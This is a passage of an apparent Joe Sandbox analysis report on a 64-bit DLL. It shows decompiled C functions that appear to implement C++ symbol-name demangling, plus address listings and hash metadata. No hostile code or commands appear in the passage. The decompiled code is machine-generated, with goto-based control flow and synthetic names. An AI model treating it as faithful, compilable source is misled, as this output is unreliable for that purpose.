                                                                      				 *(_t377 + 0xf) = r13d;
                                                                      				E0000000118000841C(__edi, _t294, _t377 - 0x19, _t377 - 9, _t370, _t372, _t377 + 7);
                                                                      				if ( *(_t377 - 0x11) - 1 <= 0) goto 0x80009bee;
                                                                      				goto 0x80009beb;
                                                                      				 *(_t377 + 0xf) = r13d;
                                                                      				 *((long long*)(_t377 + 7)) = 0x8005f780;
                                                                      				goto 0x80009a02;
                                                                      				E00000001180007AF8(_t228, __edi,  *(_t377 - 0x11) - 1, _t294, _t294, _t377 + 7, _t372, _t377 - 0x39, _t402);
                                                                      				if ( *(_t377 - 0x31) == 3) goto 0x80009cba;
                                                                      				if ( *(_t294 + 8) - 1 <= 0) goto 0x80009cba;
                                                                      				_t225 =  *(_t294 + 8) & r14d |  *(_t294 + 8) & 0x000000ff;
                                                                      				 *(_t377 - 0x31) = _t225;
                                                                      				_t184 =  *0x80071318; // 0x0
                                                                      				if (( !(_t184 >> 1) & 0x00000001) == 0) goto 0x80009cf0;
                                                                      				E000000011800082DC(_t294, _t377 + 0x27, _t370, _t372, _t400, _t398);
                                                                      				E00000001180005F48(_t294, _t377 + 7, _t377 - 0x39);
                                                                      				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                                      				 *(_t377 - 0x31) =  *(_t294 + 8);
                                                                      				goto 0x80009d0d;
                                                                      				E000000011800082DC(_t294,  *_t294, _t370, _t372);
                                                                      				if ( *(_t377 - 0x31) == 3) goto 0x80009d0d;
                                                                      				if ( *(_t294 + 8) - 1 <= 0) goto 0x80009d0d;
                                                                      				 *(_t377 - 0x31) = _t225 & r14d |  *(_t294 + 8) & 0x000000ff;
                                                                      				if ( *_t407 == _t400) goto 0x80009d53;
                                                                      				 *((long long*)(_t377 - 0x19)) = _t400;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				E00000001180007320(0x28, _t294, _t300, _t377 - 0x19);
                                                                      				E00000001180005F48(_t377 - 0x19, _t377 + 7, _t377 - 0x39);
                                                                      				r8b = 0x29;
                                                                      				E00000001180005F74(_t377 + 7, _t377 + 0x27);
                                                                      				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                                      				 *(_t377 - 0x31) =  *(_t294 + 8);
                                                                      				E0000000118000A0A4(_t294, _t300, 0x80071330, _t377 + 0x27, _t372, _t376);
                                                                      				if (_t294 == 0) goto 0x80009d75;
                                                                      				 *_t294 = _t400;
                                                                      				 *(_t294 + 8) = r13d;
                                                                      				goto 0x80009d78;
                                                                      				_t374 = _t400;
                                                                      				E0000000118000B584(_t245, _t377 + 0x17, _t370);
                                                                      				E000000011800075F0(_t300, _t377 + 0x27, _t374, _t374, _t377 - 0x39);
                                                                      				 *((long long*)(_t377 - 0x19)) = _t400;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				_t301 = _t294;
                                                                      				E00000001180007320(0x28, _t294, _t294, _t377 - 0x19);
                                                                      				E00000001180005F48(_t377 - 0x19, _t377 + 7, _t301);
                                                                      				r8b = 0x29;
                                                                      				E00000001180005F74(_t377 + 7, _t377 - 9);
                                                                      				E00000001180006090(_t228, _t377 - 0x39, _t294, _t301);
                                                                      				_t229 =  *0x80071318; // 0x0
                                                                      				if ((_t229 & 0x00000060) == 0x60) goto 0x80009df6;
                                                                      				if (r12d == 0) goto 0x80009df6;
                                                                      				E00000001180006090(_t229, _t377 - 0x39, _t377 - 0x29, _t301);
                                                                      				_t230 =  *0x80071318; // 0x0
                                                                      				if (( !(_t230 >> 0x13) & 0x00000001) == 0) goto 0x80009e17;
                                                                      				E0000000118000B3B8(_t225 & r14d |  *(_t294 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t245, _t301, _t377 + 0x27, _t370, _t374);
                                                                      				E00000001180006090( !(_t230 >> 0x13), _t377 - 0x39, _t294, _t301);
                                                                      				goto 0x80009e37;
                                                                      				E0000000118000B3B8(_t225 & r14d |  *(_t294 + 8) & 0x000000ff,  !(_t230 >> 0x13), _t245, _t301, _t377 - 0x39, _t370, _t374);
                                                                      				if ( *(_t377 - 0x31) == 3) goto 0x80009e37;
                                                                      				if ( *(_t294 + 8) - 1 <= 0) goto 0x80009e37;
                                                                      				 *(_t377 - 0x31) =  *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff;
                                                                      				E0000000118000A148(_t377 + 0x27);
                                                                      				E00000001180006090( *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff, _t377 - 0x39, _t294, _t301);
                                                                      				_t212 =  *0x80071318; // 0x0
                                                                      				if (( !(_t212 >> 8) & 0x00000001) == 0) goto 0x80009e91;
                                                                      				E0000000118000CBD8(_t377 + 0x27);
                                                                      				E00000001180006090( *(_t377 - 0x31) & r14d |  *(_t294 + 8) & 0x000000ff, _t377 - 0x39, _t294, _t301);
                                                                      				if (_t374 == 0) goto 0x80009eb0;
                                                                      				 *_t374 =  *((intOrPtr*)(_t377 - 0x39));
                                                                      				 *(_t374 + 8) =  *(_t377 - 0x31);
                                                                      				_t296 =  *((intOrPtr*)(_t377 + 0x17));
                                                                      				 *_t370 = _t296;
                                                                      				 *(_t370 + 8) =  *(_t377 + 0x1f);
                                                                      				goto 0x80009ec5;
                                                                      				E0000000118000CBD8(_t377 - 0x39);
                                                                      				if ( *(_t377 - 0x31) == 3) goto 0x80009e70;
                                                                      				if ( *(_t296 + 8) - 1 <= 0) goto 0x80009e70;
                                                                      				goto 0x80009e73;
                                                                      				 *(_t370 + 8) = r13d;
                                                                      				 *(_t370 + 8) = 3;
                                                                      				goto 0x80009ec2;
                                                                      				 *(_t370 + 8) = r13d;
                                                                      				 *(_t370 + 8) = 2;
                                                                      				 *_t370 = _t400;
                                                                      				return  *(_t296 + 8) & 0x000000ff;
                                                                      			}




































                                                                      0x1800099b4
                                                                      0x1800099b4
                                                                      0x1800099b4
                                                                      0x1800099b4
                                                                      0x1800099b7
                                                                      0x1800099bb
                                                                      0x1800099bf
                                                                      0x1800099cc
                                                                      0x1800099d7
                                                                      0x1800099da
                                                                      0x1800099dd
                                                                      0x1800099e4
                                                                      0x1800099ea
                                                                      0x1800099f3
                                                                      0x1800099f7
                                                                      0x1800099fb
                                                                      0x180009a05
                                                                      0x180009a0a
                                                                      0x180009a15
                                                                      0x180009a1a
                                                                      0x180009a23
                                                                      0x180009a2a
                                                                      0x180009a2d
                                                                      0x180009a37
                                                                      0x180009a3c
                                                                      0x180009a41
                                                                      0x180009a41
                                                                      0x180009a48
                                                                      0x180009a58
                                                                      0x180009a5c
                                                                      0x180009a60
                                                                      0x180009a6c
                                                                      0x180009a72
                                                                      0x180009a75
                                                                      0x180009a7e
                                                                      0x180009a85
                                                                      0x180009a89
                                                                      0x180009a8d
                                                                      0x180009a91
                                                                      0x180009a94
                                                                      0x180009a98
                                                                      0x180009aa8
                                                                      0x180009ab5
                                                                      0x180009abc
                                                                      0x180009ac4
                                                                      0x180009acc
                                                                      0x180009ad1
                                                                      0x180009ae1
                                                                      0x180009aea
                                                                      0x180009af1
                                                                      0x180009af4
                                                                      0x180009afe
                                                                      0x180009b04
                                                                      0x180009b0b
                                                                      0x180009b13
                                                                      0x180009b1a
                                                                      0x180009b2a
                                                                      0x180009b3b
                                                                      0x180009b46
                                                                      0x180009b4a
                                                                      0x180009b50
                                                                      0x180009b54
                                                                      0x180009b58
                                                                      0x180009b60
                                                                      0x180009b6c
                                                                      0x180009b77
                                                                      0x180009b7a
                                                                      0x180009b7c
                                                                      0x180009b7c
                                                                      0x180009b80
                                                                      0x180009b8a
                                                                      0x180009b93
                                                                      0x180009b9c
                                                                      0x180009ba0
                                                                      0x180009ba7
                                                                      0x180009baa
                                                                      0x180009bb3
                                                                      0x180009bb7
                                                                      0x180009bc1
                                                                      0x180009bcb
                                                                      0x180009bd3
                                                                      0x180009bdb
                                                                      0x180009be0
                                                                      0x180009be4
                                                                      0x180009beb
                                                                      0x180009bee
                                                                      0x180009bf8
                                                                      0x180009bfe
                                                                      0x180009c0e
                                                                      0x180009c14
                                                                      0x180009c1b
                                                                      0x180009c23
                                                                      0x180009c27
                                                                      0x180009c2a
                                                                      0x180009c3a
                                                                      0x180009c4b
                                                                      0x180009c56
                                                                      0x180009c5a
                                                                      0x180009c60
                                                                      0x180009c68
                                                                      0x180009c70
                                                                      0x180009c79
                                                                      0x180009c83
                                                                      0x180009c88
                                                                      0x180009c90
                                                                      0x180009c98
                                                                      0x180009c9d
                                                                      0x180009ca6
                                                                      0x180009cac
                                                                      0x180009cb5
                                                                      0x180009cb7
                                                                      0x180009cba
                                                                      0x180009cca
                                                                      0x180009ccc
                                                                      0x180009cdc
                                                                      0x180009ce7
                                                                      0x180009ceb
                                                                      0x180009cee
                                                                      0x180009cf0
                                                                      0x180009cf9
                                                                      0x180009cff
                                                                      0x180009d0a
                                                                      0x180009d10
                                                                      0x180009d14
                                                                      0x180009d1c
                                                                      0x180009d20
                                                                      0x180009d31
                                                                      0x180009d36
                                                                      0x180009d41
                                                                      0x180009d4c
                                                                      0x180009d50
                                                                      0x180009d5f
                                                                      0x180009d6a
                                                                      0x180009d6c
                                                                      0x180009d6f
                                                                      0x180009d73
                                                                      0x180009d75
                                                                      0x180009d7f
                                                                      0x180009d88
                                                                      0x180009d8f
                                                                      0x180009d97
                                                                      0x180009d9b
                                                                      0x180009d9e
                                                                      0x180009dae
                                                                      0x180009db3
                                                                      0x180009dbe
                                                                      0x180009dca
                                                                      0x180009dcf
                                                                      0x180009ddc
                                                                      0x180009de1
                                                                      0x180009deb
                                                                      0x180009df0
                                                                      0x180009e02
                                                                      0x180009e04
                                                                      0x180009e10
                                                                      0x180009e15
                                                                      0x180009e17
                                                                      0x180009e20
                                                                      0x180009e26
                                                                      0x180009e34
                                                                      0x180009e3b
                                                                      0x180009e47
                                                                      0x180009e4c
                                                                      0x180009e5d
                                                                      0x180009e5f
                                                                      0x180009e6b
                                                                      0x180009e76
                                                                      0x180009e7c
                                                                      0x180009e7f
                                                                      0x180009e82
                                                                      0x180009e86
                                                                      0x180009e8c
                                                                      0x180009e8f
                                                                      0x180009e91
                                                                      0x180009e9a
                                                                      0x180009ea0
                                                                      0x180009eae
                                                                      0x180009eb0
                                                                      0x180009eb4
                                                                      0x180009eb8
                                                                      0x180009eba
                                                                      0x180009ebe
                                                                      0x180009ec2
                                                                      0x180009ee8

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 2943138195-0
                                                                      • Opcode ID: 63376091f334a9ae046d5246efd1b5cafae4c01783f1ca0c6c1273046f9782f6
                                                                      • Instruction ID: c343eb9ff1440dad28d92815041df6b86f5c34136de067d1f67744e2e4e74941
                                                                      • Opcode Fuzzy Hash: 63376091f334a9ae046d5246efd1b5cafae4c01783f1ca0c6c1273046f9782f6
                                                                      • Instruction Fuzzy Hash: 04F15B76B05A889EFB52DFA4D4903ED37B1E34878CF448016EA4967B99DF34CA59C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0000000118000C4FC(void* __edx, void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v24;
                                                                      				signed int _v40;
                                                                      				char _v41;
                                                                      				char _v48;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				intOrPtr _v80;
                                                                      				char _v88;
                                                                      				char _v96;
                                                                      				char _v104;
                                                                      				void* __r14;
                                                                      				void* __r15;
                                                                      				signed int _t117;
                                                                      				char _t129;
                                                                      				void* _t134;
                                                                      				void* _t142;
                                                                      				void* _t149;
                                                                      				void* _t162;
                                                                      				void* _t166;
                                                                      				void* _t170;
                                                                      				void* _t171;
                                                                      				char _t172;
                                                                      				void* _t174;
                                                                      				void* _t176;
                                                                      				void* _t178;
                                                                      				long long* _t182;
                                                                      				long long* _t189;
                                                                      				intOrPtr _t194;
                                                                      				signed long long _t197;
                                                                      				char* _t199;
                                                                      				long long _t201;
                                                                      				long long* _t204;
                                                                      				long long* _t205;
                                                                      				long long* _t206;
                                                                      				intOrPtr _t210;
                                                                      				long long _t215;
                                                                      				intOrPtr* _t254;
                                                                      				char* _t264;
                                                                      				long long* _t266;
                                                                      				long long* _t284;
                                                                      				void* _t289;
                                                                      				void* _t297;
                                                                      				long long _t302;
                                                                      				void* _t303;
                                                                      
                                                                      				_t301 = __r12;
                                                                      				_t299 = __r11;
                                                                      				_t298 = __r10;
                                                                      				_t286 = __rsi;
                                                                      				_t215 = __rbx;
                                                                      				_t157 = __edi;
                                                                      				_t149 = __edx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t197 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v40 = _t197 ^ _t289 - 0x00000070;
                                                                      				_t199 =  *0x80071308; // 0x0
                                                                      				_t284 = __rcx;
                                                                      				r14d = 0;
                                                                      				_t129 =  *_t199;
                                                                      				_t5 = _t199 + 1; // 0x1
                                                                      				_t264 = _t5;
                                                                      				 *0x80071308 = _t264;
                                                                      				_t170 = _t129 - 0x46;
                                                                      				if (_t170 > 0) goto 0x8000c6b9;
                                                                      				if (_t170 == 0) goto 0x8000c71d;
                                                                      				_t171 = _t129 - 0x36;
                                                                      				if (_t171 > 0) goto 0x8000c654;
                                                                      				if (_t171 == 0) goto 0x8000c647;
                                                                      				_t172 = _t129;
                                                                      				if (_t172 == 0) goto 0x8000c629;
                                                                      				if (_t172 == 0) goto 0x8000c61c;
                                                                      				if (_t172 == 0) goto 0x8000c5b0;
                                                                      				if (_t172 == 0) goto 0x8000c5a3;
                                                                      				_t162 = _t129 - 0x2c;
                                                                      				if (_t172 == 0) goto 0x8000c596;
                                                                      				if (_t162 != 1) goto 0x8000c999;
                                                                      				E000000011800073CC(_t129, __rcx, __r8);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000BF40(_t284);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000D2A4(_t129, _t149, __edi, __rbx, _t284, _t264, _t284, __rsi, __r8, __r10, __r11, __r12, _t302, _t303);
                                                                      				goto 0x8000ca06;
                                                                      				_t174 =  *_t264 - 0x40;
                                                                      				if (_t174 != 0) goto 0x8000c5ec;
                                                                      				_t6 = _t264 + 1; // 0x2
                                                                      				_v80 = 4;
                                                                      				 *0x80071308 = _t6;
                                                                      				_t201 = "NULL";
                                                                      				_v88 = _t201;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E000000011800059CC(_t201, _t284,  &_v104);
                                                                      				goto 0x8000ca06;
                                                                      				_v56 = _t302;
                                                                      				_v48 = r14d;
                                                                      				E00000001180007320(0x26, _t201, _t215,  &_v56);
                                                                      				E00000001180008E04(__edi, _t174, _t201, _t215,  &_v104,  &_v104, _t284, __rsi, __r8, __r12);
                                                                      				_t293 = _t201;
                                                                      				_t266 = _t284;
                                                                      				E00000001180005F48( &_v56, _t266, _t201);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000BBA8(_t215, _t284, _t266, _t286, _t201, __r10, _t299, _t302);
                                                                      				goto 0x8000ca06;
                                                                      				_t15 = _t266 - 1; // 0x0
                                                                      				 *0x80071308 = _t15;
                                                                      				 *_t284 = 0x8005f780;
                                                                      				 *((intOrPtr*)(_t284 + 8)) = r14d;
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000A010(_t129, _t284, _t266, _t201);
                                                                      				goto 0x8000ca06;
                                                                      				if (_t174 == 0) goto 0x8000c6ac;
                                                                      				if (_t174 == 0) goto 0x8000c69f;
                                                                      				if (_t174 == 0) goto 0x8000c690;
                                                                      				if (_t174 == 0) goto 0x8000c690;
                                                                      				_t134 = _t129 - 0x2b;
                                                                      				if (_t174 == 0) goto 0x8000c683;
                                                                      				if (_t134 != 2) goto 0x8000c999;
                                                                      				E00000001180008E04(__edi, _t134 - 2, 0x8005f780, _t215, _t284, _t266, _t284, _t286, _t201, _t301);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000774C(_t134, _t284, _t266, _t201);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000988C(_t162, _t215, _t284, _t286, __r10);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000AC14(_t134, _t157, _t215, _t284, _t286, _t293);
                                                                      				goto 0x8000ca06;
                                                                      				E0000000118000D0E0(_t134, _t162, _t157, _t284, _t284, _t286, _t293, __r10, _t299, _t301, _t302, _t303);
                                                                      				goto 0x8000ca06;
                                                                      				_t176 = _t162 - 0x51;
                                                                      				if (_t176 > 0) goto 0x8000c8b5;
                                                                      				if (_t176 == 0) goto 0x8000c999;
                                                                      				if (_t176 == 0) goto 0x8000c71d;
                                                                      				if (_t176 == 0) goto 0x8000c71d;
                                                                      				if (_t176 == 0) goto 0x8000c71d;
                                                                      				if (_t176 == 0) goto 0x8000c71d;
                                                                      				if (_t176 == 0) goto 0x8000c6fd;
                                                                      				if (_t134 - 0x41 != 1) goto 0x8000c999;
                                                                      				_t204 = "nullptr";
                                                                      				_v80 = 7;
                                                                      				goto 0x8000c5ce;
                                                                      				E0000000118000CA30(_t162, _t157, _t215,  &_v104, _t284, _t286, _t293, __r10, _t299, _t302, _t303);
                                                                      				_t178 = _v96 - 1;
                                                                      				if (_t178 > 0) goto 0x8000c999;
                                                                      				E0000000118000C4FC(_t162, _t157, _t215, _t284, _t284, _t286, _t293, _t298, _t299, _t301);
                                                                      				goto 0x8000ca06;
                                                                      				_v56 = _t302;
                                                                      				_v48 = r14d;
                                                                      				E00000001180007320(0x7b, _t204, _t215,  &_v56);
                                                                      				if (_t178 == 0) goto 0x8000c74d;
                                                                      				_t142 = _t162 - 0x47;
                                                                      				if (_t178 == 0) goto 0x8000c74d;
                                                                      				if (_t142 != 1) goto 0x8000c7af;
                                                                      				E00000001180008E04(_t157, _t142 - 1, _t204, _t215,  &_v104, _t266, _t284, _t286, _t293, _t301);
                                                                      				E00000001180006090(_t142,  &_v56, _t204, _t293);
                                                                      				if (_v48 - 1 > 0) goto 0x8000c7af;
                                                                      				if (_v56 != _t302) goto 0x8000c783;
                                                                      				_v56 = _t302;
                                                                      				_v48 = r14d;
                                                                      				E00000001180007320(0x2c, _t204, _t215,  &_v56);
                                                                      				goto 0x8000c7af;
                                                                      				E0000000118000A0A4(_t204, _t215, 0x80071330, _t215, _t286);
                                                                      				_t182 = _t204;
                                                                      				if (_t182 == 0) goto 0x8000c7a0;
                                                                      				 *_t204 = 0x8005f598;
                                                                      				 *((char*)(_t204 + 8)) = 0x2c;
                                                                      				goto 0x8000c7a3;
                                                                      				_t205 = _t302;
                                                                      				E000000011800055E8(_t205, _t215,  &_v56, _t205);
                                                                      				if (_t182 == 0) goto 0x8000c832;
                                                                      				if (_t182 == 0) goto 0x8000c7d0;
                                                                      				if (_t182 == 0) goto 0x8000c894;
                                                                      				_t166 = _t162 - 0x43;
                                                                      				if (_t182 == 0) goto 0x8000c832;
                                                                      				if (_t166 != 1) goto 0x8000c8a9;
                                                                      				E0000000118000BBA8(_t215,  &_v104, _t205, _t286, _t293, _t298, _t299, _t302);
                                                                      				E00000001180006090(_t142,  &_v56, _t205, _t293);
                                                                      				if (_v48 - 1 > 0) goto 0x8000c832;
                                                                      				if (_v56 != _t302) goto 0x8000c806;
                                                                      				_v56 = _t302;
                                                                      				_v48 = r14d;
                                                                      				E00000001180007320(0x2c, _t205, _t215,  &_v56);
                                                                      				goto 0x8000c832;
                                                                      				E0000000118000A0A4(_t205, _t215, 0x80071330, _t215, _t286);
                                                                      				if (_t205 == 0) goto 0x8000c823;
                                                                      				 *_t205 = 0x8005f598;
                                                                      				 *((char*)(_t205 + 8)) = 0x2c;
                                                                      				goto 0x8000c826;
                                                                      				_t206 = _t302;
                                                                      				E000000011800055E8(_t206, _t215,  &_v56, _t206);
                                                                      				E0000000118000BBA8(_t215,  &_v104, _t206, _t286, _t293, _t298, _t299, _t302);
                                                                      				E00000001180006090(_t142,  &_v56, _t206, _t293);
                                                                      				if (_v48 - 1 > 0) goto 0x8000c894;
                                                                      				if (_v56 != _t302) goto 0x8000c868;
                                                                      				_v56 = _t302;
                                                                      				_v48 = r14d;
                                                                      				E00000001180007320(0x2c, _t206, _t215,  &_v56);
                                                                      				goto 0x8000c894;
                                                                      				E0000000118000A0A4(_t206, _t215, 0x80071330, _t215, _t286);
                                                                      				_t189 = _t206;
                                                                      				if (_t189 == 0) goto 0x8000c885;
                                                                      				 *_t206 = 0x8005f598;
                                                                      				 *((char*)(_t206 + 8)) = 0x2c;
                                                                      				goto 0x8000c888;
                                                                      				_t207 = _t302;
                                                                      				E000000011800055E8(_t302, _t215,  &_v56, _t302);
                                                                      				E0000000118000BBA8(_t215,  &_v104, _t302, _t286, _t293, _t298, _t299, _t302);
                                                                      				E00000001180006090(_t142,  &_v56, _t207, _t293);
                                                                      				r8b = 0x7d;
                                                                      				goto 0x8000c9fe;
                                                                      				if (_t189 == 0) goto 0x8000c8d2;
                                                                      				if (_t189 == 0) goto 0x8000c8fe;
                                                                      				if (_t189 == 0) goto 0x8000c8d2;
                                                                      				if (_t189 == 0) goto 0x8000c8d2;
                                                                      				if (_t142 - 0x4f != 1) goto 0x8000c999;
                                                                      				E0000000118000BBA8(_t215,  &_v104, _t207, _t286, _t293, _t298, _t299, _t302);
                                                                      				_t254 = _v104;
                                                                      				if (_t254 == 0) goto 0x8000c90a;
                                                                      				 *0x8005d348();
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t254 + 0x18)))) = r14b;
                                                                      				goto 0x8000c90e;
                                                                      				 *_t284 = _t302;
                                                                      				 *((intOrPtr*)(_t284 + 8)) = r14d;
                                                                      				goto 0x8000ca06;
                                                                      				_v56 = r14b;
                                                                      				_t117 = E00000001180039A54( *((intOrPtr*)( *_t254 + 0x18)), _t215,  &_v56, _t284, _t286,  &_v41, _t298);
                                                                      				r15d = 0xfff;
                                                                      				if (( *0x80071318 & 0x00004000) == 0) goto 0x8000c95a;
                                                                      				_t210 =  *0x80071320; // 0x0
                                                                      				if (_t210 == 0) goto 0x8000c95a;
                                                                      				 *0x8005d348();
                                                                      				_t194 = _t210;
                                                                      				if (_t194 == 0) goto 0x8000c95a;
                                                                      				r8b = r14b;
                                                                      				E0000000118000543C(_t284, _t210);
                                                                      				goto 0x8000ca06;
                                                                      				r9d = _t117 & r15d;
                                                                      				E0000000118000DE70(_t117 & r15d, _t210,  &_v56, _t210, "%d", _t297);
                                                                      				r8b = r14b;
                                                                      				E00000001180005388( &_v88,  &_v56);
                                                                      				if (_t194 == 0) goto 0x8000c9bf;
                                                                      				if (_t194 == 0) goto 0x8000c9bf;
                                                                      				if (_t194 == 0) goto 0x8000c9b6;
                                                                      				if (_t166 - 0x4f == 1) goto 0x8000c9a6;
                                                                      				 *((intOrPtr*)(_t284 + 8)) = r14d;
                                                                      				 *((char*)(_t284 + 8)) = 2;
                                                                      				 *_t284 = _t302;
                                                                      				goto 0x8000ca06;
                                                                      				_v96 = 0x1a;
                                                                      				goto 0x8000c9cd;
                                                                      				goto 0x8000c9c6;
                                                                      				_v96 = 0x19;
                                                                      				_v104 = "`template-type-parameter-";
                                                                      				asm("movaps xmm0, [ebp-0x50]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E000000011800059CC("`template-type-parameter-",  &_v72,  &_v104);
                                                                      				E00000001180005F48("`template-type-parameter-",  &_v104,  &_v88);
                                                                      				r8b = 0x27;
                                                                      				return E000000011800028F0(E00000001180005F74( &_v104, _t284), _t117 & r15d, _v40 ^ _t289 - 0x00000070);
                                                                      			}















































                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c4fc
                                                                      0x18000c501
                                                                      0x18000c506
                                                                      0x18000c517
                                                                      0x18000c521
                                                                      0x18000c525
                                                                      0x18000c52c
                                                                      0x18000c52f
                                                                      0x18000c532
                                                                      0x18000c535
                                                                      0x18000c535
                                                                      0x18000c539
                                                                      0x18000c542
                                                                      0x18000c545
                                                                      0x18000c54b
                                                                      0x18000c551
                                                                      0x18000c554
                                                                      0x18000c55a
                                                                      0x18000c560
                                                                      0x18000c562
                                                                      0x18000c56b
                                                                      0x18000c574
                                                                      0x18000c579
                                                                      0x18000c57b
                                                                      0x18000c57e
                                                                      0x18000c583
                                                                      0x18000c58c
                                                                      0x18000c591
                                                                      0x18000c599
                                                                      0x18000c59e
                                                                      0x18000c5a6
                                                                      0x18000c5ab
                                                                      0x18000c5b0
                                                                      0x18000c5b3
                                                                      0x18000c5b5
                                                                      0x18000c5b9
                                                                      0x18000c5c0
                                                                      0x18000c5c7
                                                                      0x18000c5ce
                                                                      0x18000c5d6
                                                                      0x18000c5dd
                                                                      0x18000c5e2
                                                                      0x18000c5e7
                                                                      0x18000c5ee
                                                                      0x18000c5f6
                                                                      0x18000c5fa
                                                                      0x18000c603
                                                                      0x18000c608
                                                                      0x18000c60f
                                                                      0x18000c612
                                                                      0x18000c617
                                                                      0x18000c61f
                                                                      0x18000c624
                                                                      0x18000c629
                                                                      0x18000c62d
                                                                      0x18000c63b
                                                                      0x18000c63e
                                                                      0x18000c642
                                                                      0x18000c64a
                                                                      0x18000c64f
                                                                      0x18000c657
                                                                      0x18000c65c
                                                                      0x18000c661
                                                                      0x18000c666
                                                                      0x18000c668
                                                                      0x18000c66b
                                                                      0x18000c670
                                                                      0x18000c679
                                                                      0x18000c67e
                                                                      0x18000c686
                                                                      0x18000c68b
                                                                      0x18000c695
                                                                      0x18000c69a
                                                                      0x18000c6a2
                                                                      0x18000c6a7
                                                                      0x18000c6af
                                                                      0x18000c6b4
                                                                      0x18000c6b9
                                                                      0x18000c6bc
                                                                      0x18000c6c2
                                                                      0x18000c6cb
                                                                      0x18000c6d0
                                                                      0x18000c6d5
                                                                      0x18000c6da
                                                                      0x18000c6df
                                                                      0x18000c6e4
                                                                      0x18000c6ea
                                                                      0x18000c6f1
                                                                      0x18000c6f8
                                                                      0x18000c701
                                                                      0x18000c706
                                                                      0x18000c70a
                                                                      0x18000c713
                                                                      0x18000c718
                                                                      0x18000c71f
                                                                      0x18000c727
                                                                      0x18000c72b
                                                                      0x18000c741
                                                                      0x18000c743
                                                                      0x18000c746
                                                                      0x18000c74b
                                                                      0x18000c751
                                                                      0x18000c75d
                                                                      0x18000c766
                                                                      0x18000c76c
                                                                      0x18000c770
                                                                      0x18000c778
                                                                      0x18000c77c
                                                                      0x18000c781
                                                                      0x18000c78d
                                                                      0x18000c792
                                                                      0x18000c795
                                                                      0x18000c797
                                                                      0x18000c79a
                                                                      0x18000c79e
                                                                      0x18000c7a0
                                                                      0x18000c7aa
                                                                      0x18000c7b2
                                                                      0x18000c7b7
                                                                      0x18000c7bc
                                                                      0x18000c7c2
                                                                      0x18000c7c5
                                                                      0x18000c7ca
                                                                      0x18000c7d4
                                                                      0x18000c7e0
                                                                      0x18000c7e9
                                                                      0x18000c7ef
                                                                      0x18000c7f3
                                                                      0x18000c7fb
                                                                      0x18000c7ff
                                                                      0x18000c804
                                                                      0x18000c810
                                                                      0x18000c818
                                                                      0x18000c81a
                                                                      0x18000c81d
                                                                      0x18000c821
                                                                      0x18000c823
                                                                      0x18000c82d
                                                                      0x18000c836
                                                                      0x18000c842
                                                                      0x18000c84b
                                                                      0x18000c851
                                                                      0x18000c855
                                                                      0x18000c85d
                                                                      0x18000c861
                                                                      0x18000c866
                                                                      0x18000c872
                                                                      0x18000c877
                                                                      0x18000c87a
                                                                      0x18000c87c
                                                                      0x18000c87f
                                                                      0x18000c883
                                                                      0x18000c885
                                                                      0x18000c88f
                                                                      0x18000c898
                                                                      0x18000c8a4
                                                                      0x18000c8a9
                                                                      0x18000c8b0
                                                                      0x18000c8b8
                                                                      0x18000c8bd
                                                                      0x18000c8c2
                                                                      0x18000c8c7
                                                                      0x18000c8cc
                                                                      0x18000c8d6
                                                                      0x18000c8db
                                                                      0x18000c8e2
                                                                      0x18000c8f3
                                                                      0x18000c8f9
                                                                      0x18000c8fc
                                                                      0x18000c8fe
                                                                      0x18000c901
                                                                      0x18000c905
                                                                      0x18000c90a
                                                                      0x18000c912
                                                                      0x18000c923
                                                                      0x18000c929
                                                                      0x18000c92b
                                                                      0x18000c935
                                                                      0x18000c93c
                                                                      0x18000c942
                                                                      0x18000c945
                                                                      0x18000c947
                                                                      0x18000c950
                                                                      0x18000c955
                                                                      0x18000c964
                                                                      0x18000c970
                                                                      0x18000c975
                                                                      0x18000c980
                                                                      0x18000c988
                                                                      0x18000c98d
                                                                      0x18000c992
                                                                      0x18000c997
                                                                      0x18000c999
                                                                      0x18000c99d
                                                                      0x18000c9a1
